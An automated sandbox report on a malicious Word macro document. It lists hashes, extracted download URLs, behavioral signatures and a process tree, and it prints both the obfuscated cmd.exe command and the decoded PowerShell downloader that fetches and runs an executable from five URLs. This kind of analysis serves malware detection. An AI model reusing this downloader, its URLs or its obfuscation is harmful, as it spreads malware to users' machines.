Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 23:06
Behavioral task
behavioral1
Sample
68f26248d12a0f90b841be966a92f0eb_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
68f26248d12a0f90b841be966a92f0eb_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
68f26248d12a0f90b841be966a92f0eb_JaffaCakes118.doc
-
Size
91KB
-
MD5
68f26248d12a0f90b841be966a92f0eb
-
SHA1
844f455e80056d6d2d0e28118d16b062cf6b83c7
-
SHA256
573a40257ce731457d4ecc39bfab7cbc4a77e3235244f75e27b8594d9245201c
-
SHA512
a030f56a78924dac6db76b886264de24e4b82bc95293bf98dbe796c29edfcb989f26bbd089f61eccec190c17d4dd3c10747063b8a71fb9fa144b03b5c10a9212
-
SSDEEP
1536:hptJlmrJpmxlRw99NBRC+aTmLI0+FOd7Dz4q:/te2dw99f5+FOd3zL
Malware Config
Extracted
http://docecreativo.com/dm
http://cunisoft.com/O
http://artzkaypharmacy.com.au/BlK0k0
http://askaconvict.com/KYKuG
http://atuare.com.br/ef
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2288 4680 Cmd.exe WINWORD.EXE -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exeflow pid process 28 3304 powershell.exe 32 3304 powershell.exe 34 3304 powershell.exe 38 3304 powershell.exe 40 3304 powershell.exe 48 3304 powershell.exe 49 3304 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
Cmd.exepid process 2288 Cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4680 WINWORD.EXE 4680 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3304 powershell.exe 3304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3304 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4680 WINWORD.EXE 4680 WINWORD.EXE 4680 WINWORD.EXE 4680 WINWORD.EXE 4680 WINWORD.EXE 4680 WINWORD.EXE 4680 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXECmd.exedescription pid process target process PID 4680 wrote to memory of 2288 4680 WINWORD.EXE Cmd.exe PID 4680 wrote to memory of 2288 4680 WINWORD.EXE Cmd.exe PID 2288 wrote to memory of 3304 2288 Cmd.exe powershell.exe PID 2288 wrote to memory of 3304 2288 Cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\68f26248d12a0f90b841be966a92f0eb_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SYSTEM32\Cmd.exeCmd /V^:/C"^s^e^t ^PA=^ ^ ^ ^ ^ ^ ^ ^}}^{hctac^}^;^k^a^er^b^;BP^b^$ m^etI-^ekovnI;)^BP^b$^ ,C^iZ$(^e^l^iF^d^aolnwo^D^.^Pa^i^$^{^yr^t{)j^j^D$^ ni^ C^i^Z$(hc^aer^o^f^;'e^x^e^.'+^Ovr^$+'^\^'^+ci^l^b^u^p:vn^e^$=BP^b$;^'^91^'^ = ^Ovr^$^;)'^@^'(tilp^S.'f^e/rb.^moc^.er^a^u^t^a//^:^ptt^h@G^uKY^K/^m^oc^.^tc^ivn^oca^k^s^a//^:p^tt^h^@^0k^0^K^lB/^u^a^.moc.yc^a^mr^a^hpyak^ztr^a//:^p^t^t^h@^O/^m^oc.^tf^os^in^uc//:ptth@^md/moc.^ov^ita^erceco^d//:^pt^th'=^jj^D$^;tneilCbe^W.teN ^tc^e^j^bo-w^en=Pa^i^$ l^l^e^hsr^e^w^o^p&&^f^or /^L %^F ^in (3^47,-^1^,^0)d^o ^se^t ^O^k=!^O^k!!^PA:~%^F,1!&&i^f %^F ^l^ss 1 ca^l^l %^O^k:^~^-34^8%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $iaP=new-object Net.WebClient;$Djj='http://docecreativo.com/dm@http://cunisoft.com/O@http://artzkaypharmacy.com.au/BlK0k0@http://askaconvict.com/KYKuG@http://atuare.com.br/ef'.Split('@');$rvO = '19';$bPB=$env:public+'\'+$rvO+'.exe';foreach($ZiC in $Djj){try{$iaP.DownloadFile($ZiC, $bPB);Invoke-Item $bPB;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3304
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD58f8d044a2014c5c55e293da65f7e244d
SHA12c84690036a42466ddfe96435d54fd01c35765e5
SHA256defbb5fa1f9ea77337ab9298eae8c5a4dd3f51e370da966348f77f38a1fafb8b
SHA51281b60c07284b2d4947493a12cde6df6793fdc91faa66726e5260d533d999626ccf679e6d9f45582c9d7d5b0460e92f715755c89ff43a9f1953ee1d931ed0149b